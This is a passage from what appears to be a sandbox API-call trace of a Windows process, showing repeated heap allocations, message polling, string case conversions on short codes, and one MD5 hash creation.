HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.738] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.738] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0257.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.738] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.739] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.739] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.739] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.739] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.739] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.739] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.740] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.740] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.740] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.740] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.740] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0257.740] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.740] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0257.741] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0257.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.741] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0257.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.742] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.742] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.742] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.742] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.742] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0257.743] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.743] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.743] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.743] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.743] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.743] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.744] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.744] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.744] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.744] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.744] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.744] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.744] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.745] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.745] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.745] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.745] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.745] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.746] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.746] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.746] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.746] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.746] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.746] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.747] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0257.747] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.748] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.749] RtlAllocateHeap 